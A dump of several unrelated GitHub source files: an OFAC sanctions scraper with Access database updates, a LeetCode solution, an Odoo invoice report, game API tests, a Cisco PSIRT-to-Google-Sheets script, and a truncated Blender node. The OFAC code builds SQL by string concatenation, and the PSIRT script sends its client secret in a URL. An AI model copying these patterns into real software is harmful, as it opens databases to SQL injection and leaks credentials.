C))","repo_name":"anurag5398/DSA-Problems","sub_path":"DynamicProgramming/Knapsack/TusharBdayParty.py","file_name":"TusharBdayParty.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39235962886","text":"from django.http import HttpResponseRedirect\nfrom algoritmos import settings\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport requests\nimport pypyodbc\nimport datetime\nimport json\nimport csv\nimport os\n\nconnStr = (r\"DRIVER={Microsoft Access Driver (*.mdb, *.accdb)};DBQ=\\\\Grupofux\\prestamos clientes\\FINANCIERA UNIVERSAL XPRESS\\COTIZACIONES\\GRUPO_FUX_COTIZADOR\\Archivo\\GFUX_DWH.accdb;\")\n\n# connStr = (\n# r\"DRIVER={Microsoft Access Driver (*.mdb, *.accdb)};DBQ=\"\n# + os.path.join(settings.BASE_DIR, \"GFUX_DWH.accdb\")\n# + \";\"\n# )\n\n\ndef getToken():\n r = []\n r = requests.get(\"https://sanctionssearch.ofac.treas.gov/\")\n soup = BeautifulSoup(r.text, \"html.parser\")\n table = soup.find(id=\"__VIEWSTATE\")[\"value\"]\n data = {\"token\": table}\n\n with open(\"ofactoken.json\", \"w\") as write_file:\n json.dump(data, write_file)\n return False\n\n\ndef logout(request):\n response = HttpResponseRedirect(\"/\")\n response.delete_cookie(\"username\")\n return response\n\n\ndef verificareporte(username, idinsert):\n conn = pypyodbc.connect(connStr)\n cur = conn.cursor()\n query = \"SELECT id FROM tbl_ofac_reportes where id=\" + idinsert\n cur.execute(query)\n row = cur.fetchall()\n if len(row) == 0:\n conn2 = pypyodbc.connect(connStr)\n cur2 = conn2.cursor()\n query = (\n \"insert into tbl_ofac_reportes(id,usuario) values (\"\n + idinsert\n + \",'\"\n + username\n + \"');\"\n )\n cur2.execute(query)\n cur2.commit()\n cur2.close()\n conn2.close()\n cur.close()\n conn.close()\n return len(row)\n\n\ndef searchName(name, skip):\n token = \"\"\n with open(\"ofactoken.json\") as json_file:\n data = json.load(json_file)\n token = data[\"token\"]\n r = []\n r = requests.post(\n \"https://sanctionssearch.ofac.treas.gov/\",\n data={\n \"ctl00_ctl03_HiddenField\": \";;AjaxControlToolkit, Version=3.5.40412.0, Culture=neutral\",\n \"__EVENTTARGET\": \"\",\n \"__EVENTARGUMENT\": \"\",\n \"__VIEWSTATE\": token,\n \"__VIEWSTATEGENERATOR\": \"CA0B0334\",\n \"ctl00$MainContent$ddlType\": \"\",\n \"ctl00$MainContent$txtAddress\": \"\",\n \"ctl00$MainContent$txtLastName\": name,\n \"ctl00$MainContent$txtCity\": \"\",\n \"ctl00$MainContent$txtID\": \"\",\n \"ctl00$MainContent$txtState\": \"\",\n \"ctl00$MainContent$lstPrograms\": \"\",\n \"ctl00$MainContent$ddlCountry\": \"\",\n \"ctl00$MainContent$ddlList\": \"\",\n \"ctl00$MainContent$Slider1\": \"85\",\n \"ctl00$MainContent$Slider1_Boundcontrol\": \"85\",\n \"ctl00$MainContent$btnSearch\": \"Search\",\n },\n )\n\n soup = BeautifulSoup(r.text, \"html.parser\")\n rsdata = []\n table = soup.find(id=\"gvSearchResults\")\n\n if table is not None:\n idcount = 1\n for link in table.find_all(\"tr\"):\n newdata = []\n linkofac = link.a\n actialid = 0\n if linkofac is not None:\n actialid = linkofac.get(\"href\").split(\"=\")[1]\n newdata.append(actialid)\n if int(actialid) not in skip:\n for item in link.find_all(\"td\"):\n newdata.append(item.get_text().strip())\n newdata.append(\"{}~{}\".format(idcount, actialid))\n idcount = idcount + 1\n rsdata.append(newdata)\n\n return rsdata\n\n\ndef updateUserSearch(idcompara):\n conn2 = pypyodbc.connect(connStr)\n cur2 = conn2.cursor()\n query = (\n \"update tbl_ofac_clients_search set status=1 where tbl_ofac_clients_search.id = \"\n + idcompara\n )\n cur2.execute(query)\n cur2.commit()\n cur2.close()\n conn2.close()\n\n\ndef updateUserWithData(data, idcompara):\n conn2 = pypyodbc.connect(connStr)\n cur2 = conn2.cursor()\n query = \"update tbl_ofac_clients_search set data='{}', status=1 where tbl_ofac_clients_search.id = {}\".format(\n data.replace(\"'\", \"\"), idcompara\n )\n cur2.execute(query)\n cur2.commit()\n cur2.close()\n conn2.close()\n\ndef updateUserReviewed( idcompara):\n conn2 = pypyodbc.connect(connStr)\n cur2 = conn2.cursor()\n query = \"update tbl_ofac_clients_search set revisado=1 where tbl_ofac_clients_search.id = {}\".format(\n idcompara\n )\n cur2.execute(query)\n cur2.commit()\n cur2.close()\n conn2.close()\n\n\ndef downloadfile():\n try:\n sdn = []\n alt = {}\n name = datetime.datetime.now().strftime(\"%d-%m-%Y\")\n urlsdn = \"https://www.treasury.gov/ofac/downloads/sdn.csv\"\n urlalt = \"https://www.treasury.gov/ofac/downloads/alt.csv\"\n urllib.request.urlretrieve(\n urlsdn, os.path.join(settings.BASE_DIR, \"static/data/sdn-\" + name + \".csv\")\n )\n urllib.request.urlretrieve(\n urlalt, os.path.join(settings.BASE_DIR, \"static/data/alt-\" + name + \".csv\")\n )\n\n with open(\"static/data/alt-\" + name + \".csv\", newline=\"\") as csvfile:\n spamreader = csv.reader(csvfile)\n for row in spamreader:\n if not row[0] in alt:\n alt[row[0]] = [row]\n else:\n alt[row[0]].append(row)\n\n with open(\"static/data/sdn-\" + name + \".csv\", newline=\"\") as csvfile:\n spamreader = csv.reader(csvfile)\n for row in spamreader:\n akadato = []\n if row[0] in alt:\n akadato = alt[row[0]]\n item = {\"data\": row, \"aka\": akadato}\n sdn.append(item)\n\n with open(\"data.json\", \"w\") as write_file:\n json.dump(sdn, write_file)\n except:\n pass\n","repo_name":"joelcld05/algoritmos","sub_path":"app/utils/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":5721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40173505818","text":"class Solution:\n def productExceptSelf(self, nums: List[int]) -> List[int]:\n start, end, n = 1, 1, len(nums)\n result = [1]*n \n\n for i in range(n):\n result[i] *= start\n start *= nums[i]\n result[~i] *= end\n end *= nums[~i]\n\n return result\n\n \n \n# https://zhenyu0519.github.io/2020/02/25/lc238/\n\n# init start end and n values where n = len of nums\n\n# init result array of ones(len(nums))\n\n# loop as long as n\n\n# result at i multiplies by start\n\n# start multiplies by nums at i\n\n# result at (-i)-1 multiplies by end\n\n# end multiplies by nums at (-i)-1\n\n\n","repo_name":"LukeFlaherty/interviewPrep","sub_path":"productExceptSelf.py","file_name":"productExceptSelf.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72150326984","text":"from lxml import etree\nfrom odoo import models\nimport re\n\nclass GenericInvoiceReport(models.AbstractModel):\n _name = 'report.ccu_l10n_cl_edi.generic_invoice_report'\n\n def _get_tax_amount(self, tax_group_id, info):\n amount = 0\n for tax in info:\n if tax_group_id == tax[6]:\n amount = tax[1]\n break\n return amount\n\n def get_docids(self, docids):\n return docids\n\n def _get_report_values(self, docids, data=None):\n docids = self.get_docids(docids)\n\n report_obj = self.env['ir.actions.report']\n report = report_obj._get_report_from_name('ccu_l10n_cl_edi.account_invoice_report')\n doc = []\n record = self.env['account.move'].browse(docids)\n doc.append(record)\n doc_extra = {}\n for rec in record:\n printing_config = self.env['fiscal.dte.printing.config'].search(\n [('company_id', '=', rec.company_id.id)])\n doc_extra[rec.id] = {}\n doc_extra[rec.id]['subtotal_values'] = ['0.0', '10.0', '19.0', '20.5', '20.5', '31.5', '0.0', '19.0']\n doc_extra[rec.id]['subtotal_values'] = []\n doc_extra[rec.id]['subtotal_values'].append(rec.amount_untaxed)\n doc_extra[rec.id]['is_voucher_document'] = \"0\"\n if rec.l10n_latam_document_type_id.code == '39':\n doc_extra[rec.id]['is_voucher_document'] = \"1\"\n else:\n doc_extra[rec.id]['is_voucher_document'] = \"0\"\n for ref_rec in rec.l10n_cl_reference_ids:\n found = False\n # print(ref_rec, ref_rec, ref_rec.l10n_cl_reference_doc_type_selection)\n if ref_rec.l10n_cl_reference_doc_type_selection == '39' and not found:\n doc_extra[rec.id]['is_voucher_document'] = \"1\"\n found = True\n if ref_rec.l10n_cl_reference_doc_type_selection == '61' and not found:\n origin_doc = rec.env['account.move'].search([]).filtered(lambda inv: inv.l10n_latam_document_number == ref_rec.origin_doc_number)\n for ref_orig_rec in origin_doc:\n if ref_orig_rec and ref_orig_rec.l10n_latam_document_type_id.code == '39' and not found:\n doc_extra[rec.id]['is_voucher_document'] = \"1\"\n found = True\n if printing_config:\n tax_6 = self._get_tax_amount(printing_config.tax_6_id.id, list(rec.amount_by_group))\n doc_extra[rec.id]['subtotal_values'].append(\n self._get_tax_amount(printing_config.tax_1_id.id, list(rec.amount_by_group)))\n doc_extra[rec.id]['subtotal_values'].append(\n self._get_tax_amount(printing_config.tax_2_id.id, list(rec.amount_by_group)))\n doc_extra[rec.id]['subtotal_values'].append(\n self._get_tax_amount(printing_config.tax_3_id.id, list(rec.amount_by_group)))\n doc_extra[rec.id]['subtotal_values'].append(\n self._get_tax_amount(printing_config.tax_4_id.id, list(rec.amount_by_group)))\n doc_extra[rec.id]['subtotal_values'].append(\n self._get_tax_amount(printing_config.tax_5_id.id, list(rec.amount_by_group)))\n doc_extra[rec.id]['subtotal_values'].append(rec.amount_total - tax_6)\n doc_extra[rec.id]['subtotal_values'].append(tax_6)\n doc_extra[rec.id]['vat_total'] = tax_6\n else:\n doc_extra[rec.id]['subtotal_values'].append(0)\n doc_extra[rec.id]['subtotal_values'].append(0)\n doc_extra[rec.id]['subtotal_values'].append(0)\n doc_extra[rec.id]['subtotal_values'].append(0)\n doc_extra[rec.id]['subtotal_values'].append(0)\n doc_extra[rec.id]['subtotal_values'].append(rec.amount_total)\n doc_extra[rec.id]['subtotal_values'].append(0)\n doc_extra[rec.id]['vat_total'] = 0\n\n ted = record._l10n_cl_get_dte_barcode_xml()\n ted_groups = re.search(\"(?P.*)\\.*\", ted.get('ted', ''), flags=re.DOTALL)\n ted_xml = etree.XML(ted_groups.group('ted'))\n ted_string_list = etree.tostring(ted_xml, encoding='utf-8').decode().split(\"\\n\")\n ted_string = ''.join([x.strip() for x in ted_string_list])\n doc_extra[rec.id]['pdf417'] = rec._pdf417_barcode(ted_string)\n if rec.pos_order_ids:\n pos_order = self.env['pos.order'].browse(rec.pos_order_ids[0].id)\n stock_picking = self.env['stock.picking'].search([('pos_order_id', '=', pos_order.id)])\n if pos_order.payment_ids:\n payment_form = pos_order.payment_ids[0].payment_method_id.name\n doc_extra[rec.id]['payment_form'] = payment_form\n else:\n doc_extra[rec.id]['payment_form'] = \"-\"\n doc_extra[rec.id]['pos_order'] = pos_order\n doc_extra[rec.id]['stock_picking'] = stock_picking\n else:\n doc_extra[rec.id]['payment_form'] = ''\n doc_extra[rec.id]['pos_order'] = ''\n doc_extra[rec.id]['stock_picking'] = ''\n\n # print([\"EXTRA\", doc_extra])\n\n docargs = {\n 'doc_ids': docids,\n 'doc_model': report.model,\n 'docs': doc,\n 'docs_extra': doc_extra\n }\n return docargs","repo_name":"marcobustamanteab/odoo-pos","sub_path":"src/custom-addons/ccu_l10n_cl_edi/report/generic_invoice_report.py","file_name":"generic_invoice_report.py","file_ext":"py","file_size_in_byte":5581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70821207946","text":"from typing import List, Optional\n\nimport pytest\nimport requests\nfrom requests import Response\n\nfrom app.models.game import Game\nfrom app.schemas import game_schema\nfrom app.schemas.game_schema import (\n Action, DoActionRequest,\n SeeEventCardOptionsPayload, UseEventCardPayload,\n ForceAnotherPlayerToChooseCardPayload\n)\n\n\nclass BaseGameTestCase:\n @pytest.fixture(autouse=True)\n def _setup(self, client, game: Game, auth_header_generator):\n self.client = client\n self.game = game\n self.auth_header = auth_header_generator\n\n @property\n def do_action_url(self):\n return \"api/v1/game/action\"\n\n @property\n def my_game_url(self):\n return \"api/v1/game/my-game\"\n\n def _start_call_for_action(self):\n request = {\n \"game_id\": \"1\",\n \"action\": {\n \"actionType\": \"call for an attack\",\n \"actionData\": None\n },\n \"payload\": None\n }\n headers = self.auth_header(self.game.get_jr_caption())\n self.client.post(\n self.do_action_url, json=request, headers=headers\n )\n\n def _vote(self, player: str) -> requests.Response:\n request = {\n \"gameId\": self.game.id,\n \"action\": {\n \"actionType\": \"vote\",\n },\n \"payload\": {\n \"voteCardIndex\": 0\n }\n }\n headers = self.auth_header(player)\n response = self.client.post(\n self.do_action_url, headers=headers, json=request\n )\n return response\n\n def _call_for_an_attack(self, player: str):\n request = {\n \"game_id\": \"1\",\n \"action\": {\n \"actionType\": \"call for an attack\",\n \"actionData\": None\n },\n \"payload\": None\n }\n\n headers = self.auth_header(player)\n response = self.client.post(\n self.do_action_url, json=request, headers=headers\n )\n return response\n\n def _maroon_crew(self, captain: str, player: str) -> Response:\n request = {\n \"gameId\": \"1\",\n \"action\": {\n \"actionType\": \"maroon any crew mate to tortuga\",\n },\n \"payload\": {\n \"crewToMaroon\": player\n }\n }\n headers = self.auth_header(captain)\n response = self.client.post(\n self.do_action_url, json=request, headers=headers\n )\n return response\n\n def _move_action(self, player_to_move: str,\n position: game_schema.Positions) -> Response:\n request = {\n \"gameId\": 1,\n \"action\": {\n \"actionType\": \"move\",\n },\n \"payload\": {\n \"move_where\": position\n }\n }\n\n headers = self.auth_header(player_to_move)\n return self.client.post(url=self.do_action_url, json=request,\n headers=headers)\n\n def _move_treasure_action(self,\n player: str,\n from_hold: game_schema.TreasureHoldTeams):\n json = {\n \"gameId\": \"1\",\n \"action\": {\n \"actionType\": \"move treasure\",\n },\n \"payload\": {\n \"from_hold\": from_hold\n }\n }\n\n headers = self.auth_header(player)\n return self.client.post(url=self.do_action_url, json=json,\n headers=headers)\n\n def _call_brawl_action(self, player: str) -> Response:\n request = {\n \"gameId\": \"1\",\n \"action\": {\n \"actionType\": \"call for brawl\"\n }\n }\n\n headers = self.auth_header(player)\n return self.client.post(url=self.do_action_url, json=request,\n headers=headers)\n\n def _call_for_mutiny_action(self, player: str) -> Response:\n request = {\n \"gameId\": \"1\",\n \"action\": {\n \"actionType\": \"call for a mutiny\"\n },\n }\n headers = self.auth_header(player)\n return self.client.post(url=self.do_action_url, json=request,\n headers=headers)\n\n def _view_two_event_cards_action(self, player, event_cards: List[int]):\n request = {\n \"gameId\": 1,\n \"action\": {\n \"actionType\": \"view two event cards\"\n },\n \"payload\": {\n \"eventCardsIndexes\": event_cards\n }\n }\n headers = self.auth_header(player)\n return self.client.post(url=self.do_action_url, json=request,\n headers=headers)\n\n def _reveal_event_card_action(self, player, index):\n request = {\n \"gameId\": 1,\n \"action\": {\n \"actionType\": \"reveal one event card\",\n },\n \"payload\": {\n \"event_card_index\": index\n }\n }\n headers = self.auth_header(player)\n return self.client.post(url=self.do_action_url, json=request,\n headers=headers)\n\n def _keep_event_card_action(self, player):\n request = DoActionRequest(\n action=Action(\n action_type=Action.ActionType.KEEP_EVENT_CARD,\n ),\n game_id=\"1\",\n )\n headers = self.auth_header(player)\n return self.client.post(url=self.do_action_url, data=request.json(),\n headers=headers)\n\n def use_event_card_action(self, player, slug: str,\n option: Optional[int] = None):\n payload = UseEventCardPayload(\n event_card_to_use=slug,\n )\n if option is not None:\n payload.event_card_option_index = option\n\n request = DoActionRequest(\n action=Action(\n action_type=Action.ActionType.USE_EVENT_CARD\n ),\n game_id=\"1\",\n payload=payload\n )\n headers = self.auth_header(player)\n return self.client.post(self.do_action_url, data=request.json(),\n headers=headers)\n\n def force_another_player_to_choose_card(self,\n other_player: str,\n player: str,\n event_card_indexes: List[int]):\n payload = ForceAnotherPlayerToChooseCardPayload(\n forced_player=other_player,\n event_cards_indexes=event_card_indexes\n )\n request = DoActionRequest(\n action=Action(\n action_type=Action.ActionType.FORCE_ANOTHER_PLAYER_TO_CHOOSE_CARD\n ),\n game_id=\"1\",\n payload=payload\n )\n headers = self.auth_header(player)\n return self.client.post(\n self.do_action_url, data=request.json(), headers=headers\n )\n\n def _get_my_game(self, player) -> Response:\n headers = self.auth_header(player)\n response = self.client.get(self.my_game_url, headers=headers)\n return response\n","repo_name":"Glyphack/tortuga","sub_path":"app/tests/api/game/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":7201,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"32759196173","text":"import os\nimport configparser\nimport logging\nimport logging.handlers as handlers\nimport sys\nimport json\nimport csv\nfrom datetime import date, timedelta\nfrom time import time\nimport gspread\nimport requests\n\nlogger = logging.getLogger(\"botsheet\")\nlogger.setLevel(logging.DEBUG)\nlogHandler = handlers.RotatingFileHandler(\n r\".\\logs\\debug.log\", maxBytes=5600, backupCount=2\n)\nlogHandler.setLevel(logging.DEBUG)\nlogFormatter = logging.Formatter(\n \"%(asctime)s [%(levelname)s] %(message)s\", \"%Y-%m-%d %H:%M:%S\"\n)\nstdHandler = logging.StreamHandler(sys.stdout)\nlogHandler.setFormatter(logFormatter)\nstdHandler.setFormatter(logFormatter)\nlogger.addHandler(stdHandler)\n\nKEY = \"CI\"\nenviron = os.getenv(KEY, default=\"LOCAL\")\n\nif environ == \"true\":\n psirt_grant = \"client_credentials\"\n psirt_client_id = os.environ[\"psirt_client_id\"]\n psirt_client_secret = os.environ[\"psirt_client_secret\"]\n sa = gspread.service_account(\"service_account.json\")\nelse:\n config = configparser.ConfigParser()\n config.read(\"config.ini\")\n psirt_grant = config[\"PSIRT\"][\"grant_type\"]\n psirt_client_id = config[\"PSIRT\"][\"client_id\"]\n psirt_client_secret = config[\"PSIRT\"][\"client_secret\"]\n sa = gspread.service_account()\n logger.addHandler(logHandler)\n\nlogger.info(\"Trying to open PSIRTs Google Sheet\")\ntry:\n sh = sa.open(\"PSIRTs\")\nexcept gspread.exceptions.APIError(response) as e:\n print(type(e))\n print(e)\nwks = sh.worksheet(\"Last7\")\n\nsh_14 = sa.open(\"PSIRT-14\")\nwks_14 = sh_14.worksheet(\"Last14\")\n\nsh_30 = sa.open(\"PSIRT-30\")\nwks_30 = sh_30.worksheet(\"Last30\")\n\n\ndef recent_update_7(verify_cve_date):\n \"\"\"Determines if CVE entry has been updated in last 7 days\n\n Args:\n verify_cve_date (string): yyyy-mm-ddThh:mm:ss\n\n Returns:\n bool: True if entry has been updated in last 7 days\n \"\"\"\n t_index = verify_cve_date.index(\"T\")\n stripped_date = verify_cve_date[:t_index:]\n split_date = tuple(stripped_date.split(\"-\"))\n new_date = date(int(split_date[0]), int(split_date[1]), int(split_date[2]))\n seven_days = date.today() - timedelta(days=7)\n recent = seven_days < new_date\n return recent\n\n\ndef recent_update_14(verify_cve_date):\n \"\"\"Determines if CVE entry has been updated in last 14 days\n\n Args:\n verify_cve_date (string): yyyy-mm-ddThh:mm:ss\n\n Returns:\n bool: True if entry has been updated in last 14 days\n \"\"\"\n t_index = verify_cve_date.index(\"T\")\n stripped_date = verify_cve_date[:t_index:]\n split_date = tuple(stripped_date.split(\"-\"))\n new_date = date(int(split_date[0]), int(split_date[1]), int(split_date[2]))\n fourteen_days = date.today() - timedelta(days=14)\n recent = fourteen_days < new_date\n return recent\n\n\ndef recent_update_30(verify_cve_date):\n \"\"\"Determines if CVE entry has been updated in last 30 days\n\n Args:\n verify_cve_date (string): yyyy-mm-ddThh:mm:ss\n\n Returns:\n bool: True if entry has been updated in last 30 days\n \"\"\"\n t_index = verify_cve_date.index(\"T\")\n stripped_date = verify_cve_date[:t_index:]\n split_date = tuple(stripped_date.split(\"-\"))\n new_date = date(int(split_date[0]), int(split_date[1]), int(split_date[2]))\n thirty_days = date.today() - timedelta(days=30)\n recent = thirty_days < new_date\n return recent\n\n\ndef psirt_otoken(\n psirt_f_grant, psirt_f_client_id, psirt_f_client_secret\n): # psirt_grant, psirt_client_id, psirt_client_secret\n \"\"\"This function creates the OAuth token\n\n Args:\n grant (str): Token grant type\n (https://raw.githubusercontent.com/api-at-cisco/Images/master/Token_Access.pdf)\n client_id (str): API username\n client_secret (str): API password\n\n Returns:\n access_token (str): Access token\n token_type (str): Token type (\"Bearer\")\n token_dies (time): When token expires\n \"\"\"\n\n otoken_url = (\n f\"https://cloudsso.cisco.com/as/token.oauth2?grant_type={psirt_f_grant}\"\n f\"&client_id={psirt_f_client_id}&client_secret={psirt_f_client_secret}\"\n )\n\n try:\n otoken_response = requests.request(\"POST\", otoken_url)\n otoken_response.raise_for_status()\n except requests.HTTPError:\n otoken_status = otoken_response.status_code\n if otoken_status == 401:\n logging.error(\"Invalid API key.\")\n elif otoken_status == 404:\n logging.error(\"Invalid input.\")\n elif otoken_status in (429, 443):\n logging.error(\"API calls per minute exceeded.\")\n elif otoken_status == 400:\n logging.error(\"API bad request.\")\n sys.exit(1)\n\n otoken_data = otoken_response.json()\n\n otoken_access_token = otoken_data[\"access_token\"]\n otoken_token_type = otoken_data[\"token_type\"]\n otoken_token_expires = otoken_data[\"expires_in\"]\n\n otoken_token_dies = time() + (otoken_token_expires - 120)\n\n return (otoken_access_token, otoken_token_type, otoken_token_dies)\n\n\n# Get OAUTH\notoken_token, otoken_type, otoken_expiry = psirt_otoken(\n psirt_grant, psirt_client_id, psirt_client_secret\n)\n\nlogger.info(\"------------------------------------------------------\")\n\n# Begin of PSIRT request\n\nTODAY = date.today()\nTODAY_STR = str(TODAY)\nDELTA = timedelta(days=90)\nNINETY_DAYS = TODAY - DELTA\nNINETY_DAYS_STR = str(NINETY_DAYS)\n\npsirt_url = (\n f\"https://api.cisco.com/security/advisories/all/firstpublished\"\n f\"?startDate={NINETY_DAYS_STR}&endDate={TODAY_STR}\"\n)\n\npsirt_token = f\"Bearer {otoken_token}\"\npsirt_headers = {\"Authorization\": psirt_token}\n\ntry:\n psirt_response = requests.request(\"GET\", psirt_url, headers=psirt_headers)\n psirt_response.raise_for_status()\nexcept requests.HTTPError:\n status = psirt_response.status_code\n if status in (401, 403):\n logger.error(\"Invalid PSIRT API key.\")\n elif status == 404:\n logger.error(\"Invalid PSIRT request input.\")\n elif status in (429, 443):\n logger.error(\"PSIRT API calls per minute exceeded.\")\n sys.exit(1)\n\npsirt_json_response = json.loads(psirt_response.text)\n\n# End of PSIRT request\n\n# Convert the PSIRT response to a CSV\n\ncve_entries = psirt_json_response[\"advisories\"]\n\nENTRY_COUNT = 1\nUPDATED_ENTRIES = 1\nG_ENTRY_COUNT = 1\nG_UPDATED_ENTRIES_7 = 1\nG_UPDATED_ENTRIES_14 = 1\nG_UPDATED_ENTRIES_30 = 1\n\nheader_names = [\n \"Advisory_ID\",\n \"Advisory_Title\",\n \"CVEs\",\n \"CVE_Base_Score\",\n \"Criticality\",\n \"PSIRT_Version\",\n \"First_Published\",\n \"Last_Updated\",\n \"CVE_Status\",\n \"Products\",\n \"Pub_URL\",\n]\n\nif environ == \"LOCAL\":\n with open(\n r\".\\reports\\Cisco_PSIRT_\" + TODAY_STR + \".csv\",\n \"w\",\n newline=\"\",\n encoding=\"UTF-8\",\n ) as csvfile:\n csvwriter = csv.writer(csvfile, delimiter=\";\")\n csvwriter.writerow(header_names)\n\n for entry in cve_entries:\n last_updated = entry[\"lastUpdated\"]\n fresh_update = recent_update_7(last_updated)\n if fresh_update is True:\n UPDATED_ENTRIES += 1\n advisory_id = entry[\"advisoryId\"]\n advisory_title = entry[\"advisoryTitle\"]\n cve_score = entry[\"cvssBaseScore\"]\n criticality = entry[\"sir\"]\n psirt_version = entry[\"version\"]\n first_published = entry[\"firstPublished\"]\n cve_status = entry[\"status\"]\n product_names = entry[\"productNames\"]\n pub_url = entry[\"publicationUrl\"]\n row = [\n advisory_id,\n advisory_title,\n cve_score,\n criticality,\n psirt_version,\n first_published,\n last_updated,\n cve_status,\n product_names,\n pub_url,\n ]\n csvwriter.writerow(row)\n\n ENTRY_COUNT += 1\n\n# End of conversion\n\n# Update 7-day Google Sheet\n\nlogger.info(\"Populate 7-day Google Sheet\")\n\nwks.clear()\n\nwks.update(\"A1:K1\", [header_names])\n\nfor entry in cve_entries:\n last_updated = entry[\"lastUpdated\"]\n fresh_update = recent_update_7(last_updated)\n if fresh_update is True:\n G_UPDATED_ENTRIES_7 += 1\n advisory_id = entry[\"advisoryId\"]\n advisory_title = entry[\"advisoryTitle\"]\n cves_lst = entry[\"cves\"]\n cves = \", \".join(cves_lst)\n cve_score = entry[\"cvssBaseScore\"]\n criticality = entry[\"sir\"]\n psirt_version = entry[\"version\"]\n first_published = entry[\"firstPublished\"]\n cve_status = entry[\"status\"]\n product_names = f'{entry[\"productNames\"]}'\n pub_url = entry[\"publicationUrl\"]\n row = [\n advisory_id,\n advisory_title,\n cves,\n cve_score,\n criticality,\n psirt_version,\n first_published,\n last_updated,\n cve_status,\n product_names,\n pub_url,\n ]\n gsheet_row = f\"A{G_UPDATED_ENTRIES_7}:K{G_UPDATED_ENTRIES_7}\"\n wks.update(gsheet_row, [row])\n G_ENTRY_COUNT += 1\n\n# Update 14-day Google Sheet\nlogger.info(\"Populate 14-day Google Sheet\")\n\nwks_14.clear()\n\nwks_14.update(\"A1:K1\", [header_names])\n\nfor entry in cve_entries:\n last_updated = entry[\"lastUpdated\"]\n fresh_update = recent_update_14(last_updated)\n if fresh_update is True:\n G_UPDATED_ENTRIES_14 += 1\n advisory_id = entry[\"advisoryId\"]\n advisory_title = entry[\"advisoryTitle\"]\n cves_lst = entry[\"cves\"]\n cves = \", \".join(cves_lst)\n cve_score = entry[\"cvssBaseScore\"]\n criticality = entry[\"sir\"]\n psirt_version = entry[\"version\"]\n first_published = entry[\"firstPublished\"]\n cve_status = entry[\"status\"]\n product_names = f'{entry[\"productNames\"]}'\n pub_url = entry[\"publicationUrl\"]\n row = [\n advisory_id,\n advisory_title,\n cves,\n cve_score,\n criticality,\n psirt_version,\n first_published,\n last_updated,\n cve_status,\n product_names,\n pub_url,\n ]\n gsheet_row = f\"A{G_UPDATED_ENTRIES_14}:K{G_UPDATED_ENTRIES_14}\"\n wks_14.update(gsheet_row, [row])\n\n# Update 30-day Google Sheet\nlogger.info(\"Populate 30-day Google Sheet\")\n\nwks_30.clear()\n\nwks_30.update(\"A1:K1\", [header_names])\n\nfor entry in cve_entries:\n last_updated = entry[\"lastUpdated\"]\n fresh_update = recent_update_30(last_updated)\n if fresh_update is True:\n G_UPDATED_ENTRIES_30 += 1\n advisory_id = entry[\"advisoryId\"]\n advisory_title = entry[\"advisoryTitle\"]\n cves_lst = entry[\"cves\"]\n cves = \", \".join(cves_lst)\n cve_score = entry[\"cvssBaseScore\"]\n criticality = entry[\"sir\"]\n psirt_version = entry[\"version\"]\n first_published = entry[\"firstPublished\"]\n cve_status = entry[\"status\"]\n product_names = f'{entry[\"productNames\"]}'\n pub_url = entry[\"publicationUrl\"]\n row = [\n advisory_id,\n advisory_title,\n cves,\n cve_score,\n criticality,\n psirt_version,\n first_published,\n last_updated,\n cve_status,\n product_names,\n pub_url,\n ]\n gsheet_row = f\"A{G_UPDATED_ENTRIES_30}:K{G_UPDATED_ENTRIES_30}\"\n wks_30.update(gsheet_row, [row])\n\nTTL_CNT = G_ENTRY_COUNT - 1\nSVN_CNT = G_UPDATED_ENTRIES_7 - 1\nFTN_CNT = G_UPDATED_ENTRIES_14 - 1\nTTY_CNT = G_UPDATED_ENTRIES_30 - 1\n\nlogger.info(\"Total number of CVE entries: %s\", TTL_CNT)\nlogger.info(\"Number of updated CVE entries in last 7-days: %s\", SVN_CNT)\nlogger.info(\"Number of updated CVE entries in last 14-days: %s\", FTN_CNT)\nlogger.info(\"Number of updated CVE entries in last 30-days: %s\", TTY_CNT)\n\nif SVN_CNT == 0:\n wks.update(\"A2\", \"No updated CVEs in this time-frame\")\n\nif FTN_CNT == 0:\n wks_14.update(\"A2\", \"No updated CVEs in this time-frame\")\n\n\nif TTY_CNT == 0:\n wks_30.update(\"A2\", \"No updated CVEs in this time-frame\")\n","repo_name":"dirflash/psirt-gsheets","sub_path":"botsheet.py","file_name":"botsheet.py","file_ext":"py","file_size_in_byte":12106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13349901818","text":"import bpy\nfrom bpy.props import *\nfrom dataclasses import dataclass\nfrom ... utils import save_to_disk as sd\nfrom animation_nodes . base_types import AnimationNode\n\nclassTypeItems = {\n (\"BOOLEAN\", \"Boolean\", \"Boolean list\", \"\", 0),\n (\"INTEGER\", \"Integer\", \"Integer list\", \"\", 1),\n (\"FLOAT\", \"Float\", \"Float list\", \"\", 2),\n (\"VECTOR\", \"Vector\", \"3D Vector list\", \"\", 3),\n (\"COLOR\", \"Color\", \"Color list\", \"\", 4),\n (\"QUATERNION\", \"Quaternion\", \"Quaternion list\", \"\", 5),\n (\"MATRIX\", \"Matrix\", \"4x4 Matrix list\", \"\", 6)\n}\n\n@dataclass\nclass DataContainer:\n data: list\n filePath: str\n classType: str\n startFrame: int\n endFrame: int\n maxLength: int\n\ncache = {}\n\nclass BF_DiskCacheWriterNode(bpy.types.Node, AnimationNode):\n bl_idname = \"an_bf_DiskCacheWriterNode\"\n bl_label = \"Disk Cache Writer\"\n bl_width_default = 180\n errorHandlingType = \"EXCEPTION\"\n\n classType: EnumProperty(name=\"Input List Type\", default=\"VECTOR\", items=classTypeItems, update=AnimationNode.refresh)\n\n def create(self):\n self.newInput(\"Text\", \"File Path\", \"filePath\",\n value=\"/tmp/an_cache.npy\",\n showFileChooser = True,\n defaultDrawType = \"PROPERTY_ONLY\")\n socketType = self.classType.title() + \" List\"\n self.newInput(socketType, \"Data\", \"data\")\n self.newInput(\"Integer\", \"Start Frame\", 